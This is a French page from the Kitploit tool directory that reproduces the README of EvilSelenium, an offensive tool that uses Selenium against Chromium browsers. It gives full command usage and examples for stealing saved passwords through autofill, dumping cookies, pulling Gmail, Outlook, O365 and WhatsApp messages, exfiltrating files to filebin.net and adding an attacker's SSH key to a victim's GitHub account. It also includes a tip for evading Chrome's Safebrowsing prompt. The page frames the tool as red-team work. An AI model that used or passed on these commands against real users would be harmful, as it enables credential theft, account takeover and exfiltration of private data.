Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
EvilSelenium — Arme Selenium pour automatiser le vol d'identifiants, le dump de cookies, l'exfiltration d'e-mails et l'extraction de fichiers depuis les navigateurs Chromium pour des opérations d'équipe rouge. | Kitploit
Outils/GitHubGitHub/mrd0x/evilselenium
Outils de PhishingExfiltration de DonnéesCollecte d'InformationsPost-ExploitationIngénierie SocialeRed Teaming
GitHubmrd0x/evilselenium

EvilSelenium

Arme Selenium pour automatiser le vol d'identifiants, le dump de cookies, l'exfiltration d'e-mails et l'extraction de fichiers depuis les navigateurs Chromium pour des opérations d'équipe rouge.

Voir le dépôt
605934il y a 4 ansVérifié par Kitploit

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

EvilSelenium

EvilSelenium est un nouveau projet qui arme Selenium pour abuser des navigateurs basés sur Chromium. Les fonctionnalités actuelles sont :

  • Voler les identifiants enregistrés (via l'autocomplétion)
  • Voler les cookies
  • Prendre des captures d'écran de sites web
  • Extraire les e-mails Gmail/O365
  • Extraire les messages WhatsApp
  • Télécharger et exfiltrer des fichiers
  • Ajouter des clés SSH à GitHub

Ou étendre les fonctionnalités existantes selon vos besoins (par ex. télécharger des fichiers depuis GDrive/OneDrive de l'utilisateur).

Remarque

  1. Lorsque cet outil est exécuté, il mettra fin à tous les processus de navigateur existants afin de pouvoir fonctionner avec le profil du navigateur de l'utilisateur qui contient les mots de passe et les sessions actives.

  2. J'ai construit cet outil en environ une semaine et je n'ai pas effectué autant de tests que je l'aurais dû, donc il peut y avoir quelques bugs.

  3. Les modules Selenium ne sont pas toujours stables. En raison des changements constants sur les sites web, certains modules peuvent parfois cesser de fonctionner. Je ferai de mon mieux pour maintenir les modules existants afin qu'ils fonctionnent comme prévu, mais vous êtes prévenu.

Utilisation

root@kitploit:~
EvilSelenium.exe /?

/help - Afficher ce menu d'aide.

SETUP:
/install - Installer chromedriver et Selenium webdriver. Exécutez-le une fois.

GLOBAL : (accepté avec chaque commande)
/browserdir [appdata_local_routing] - Utiliser un navigateur personnalisé, l'entrée doit être le chemin dans le répertoire %appdatalocal% (par ex. "Microsoft\Edge")

RECON:
/enumsavedsites [out_path] - Vérifier quels sites web ont des mots de passe enregistrés via une ou plusieurs captures d'écran.
/screenshot [website] [out_path] - Prendre une capture d'écran d'une page web donnée.

CREDENTIALS:
/autorun - Extraire les identifiants enregistrés des sites web courants.
/dynamicid [login_page] [username_id] [password_id] - Extraire les identifiants enregistrés d'un site web en fournissant l'ID du champ nom d'utilisateur et l'ID du champ mot de passe.
/dynamicname [login_page] [username_name] [password_name] - Extraire les identifiants enregistrés d'un site web en fournissant la valeur de l'attribut name du champ nom d'utilisateur et celle du champ mot de passe.
/dynamicname2 [login_page] [username_position] [password_position] [username_name] [password_name] - Extraire les identifiants enregistrés d'un site web en fournissant la valeur de l'attribut name du champ nom d'utilisateur, celle du champ mot de passe et leurs positions.

COOKIES:
/cookies [website] - Récupère les cookies pour un site web donné.

MODULES:
/download [file_url] [seconds] - Télécharge un fichier et spécifie le temps d'attente pour la fin du téléchargement. Les extensions de fichier ne doivent pas être exécutables.
/exfil [local_file] [seconds] - Télécharge un fichier sur filebin.net et affiche le lien de téléchargement.
/gmail [out_path] [num_of_emails] - Récupère les e-mails de mail.google.com si l'utilisateur est authentifié. Maximum 50 e-mails.
/outlook [out_path] [num_of_emails] - Récupère les e-mails d'Outlook si l'utilisateur est authentifié.
/o365 [out_path] [num_of_emails] - Récupère les e-mails d'O365 Outlook si l'utilisateur est authentifié.
/github [key] - Ajoute votre clé SSH à GitHub si l'utilisateur est authentifié.
/whatsapp [out_path] - Récupère les messages WhatsApp si l'utilisateur est authentifié (BETA).

Configuration

La commande /install téléchargera le Chrome Driver et Selenium WebDriver qui sont les prérequis nécessaires. EvilSelenium fonctionnera sur les versions 100 à 90 de Chrome.

Testé sur Windows 10, Chrome v97 et v90.

root@kitploit:~
EvilSelenium.exe /install

Configuration globale

Par défaut, EvilSelenium essaiera d'utiliser le dossier User Data de Google Chrome pour récupérer les données, mais d'autres navigateurs basés sur Chromium sont également pris en charge.
Pour utiliser différents navigateurs basés sur Chrome, vous devez ajouter /browserdir suivi du chemin du navigateur dans le répertoire %localappdata%. Voici des exemples pour quelques navigateurs courants (à ajouter à toute commande CLI) :

  1. Brave - /browserdir BraveSoftware\Brave-Browser
  2. Microsoft Edge - /browserdir Microsoft\Edge
  3. Vivaldi - /browserdir Vivaldi

Module de reconnaissance

/enumsavedsites – Cette commande prendra des captures d'écran de chrome://settings/passwords

/screenshot – Prendre une capture d'écran de n'importe quel site web. Si l'utilisateur est authentifié sur le site, vous obtenez des captures d'écran authentifiées :).

Module d'identifiants

IMPORTANT : Le module d'identifiants SUPPRIMERA LES COOKIES afin de voler les identifiants via l'autocomplétion. Idéalement, vous devriez utiliser le module d'identifiants à la fin si vous souhaitez exporter les cookies.

/autorun – Modèles préconstruits pour les sites web courants. Je continuerai à en ajouter.

/dynamicid – Fournir l'URL de connexion ainsi que l'ID du champ de saisie du nom d'utilisateur et l'ID du champ mot de passe. Cela équivaut à document.getElementById().

/dynamicname – Si les champs n'ont pas d'ID, fournir les valeurs des attributs name des champs. Il prendra le premier index des valeurs name. Cela équivaut à document.getElementsByName()[0].value.

/dynamicname2 – Fournir les valeurs des attributs name des champs ainsi que leur position d'index. Cela équivaut à document.getElementsByName()[x].value où x est la position fournie.

Module de cookies

/cookies – Extrait les cookies du site web spécifié.

Modules divers

Ce sont des modules supplémentaires que j'ai construits pour démontrer le type d'actions que vous pouvez réaliser avec Selenium.

/download – Télécharger un fichier et spécifier le temps d'attente pour le téléchargement. Une extension de fichier non exécutable doit être ajoutée au fichier avant le téléchargement pour éviter l'invite de Safebrowsing de Chrome.

/exfil – Télécharge un fichier sur filebin.net et spécifie le temps d'attente pour la fin du téléchargement. Une fois le téléchargement terminé, le lien de téléchargement du fichier est affiché.

/gmail – Récupère les e-mails de mail.google.com si l'utilisateur est authentifié. Maximum 50 e-mails.

/outlook – Récupère les e-mails d'Outlook si l'utilisateur est authentifié.

/o365 – Récupère les e-mails d'O365 Outlook si l'utilisateur est authentifié.

/github – Ajoute votre clé SSH à GitHub si l'utilisateur est authentifié.

/whatsapp – Récupère les messages WhatsApp si l'utilisateur est authentifié (BETA).

Exemples de commandes

root@kitploit:~
EvilSelenium.exe /screenshot https://mail.google.com c:\users\mr.d0x\downloads

EvilSelenium.exe /dynamicid https://www.hybrid-analysis.com/login login_email login_password

EvilSelenium.exe /dynamicname https://linkedin.com session_key session_password

Démo

Example

Support

  • Suivez-moi sur Twitter @mrd0x
  • Portefeuille BTC : 38ApE9ciNHiXzEaQExLXdwM6TrEpz2wCUi (pour le café évidemment)
Télécharger l’outil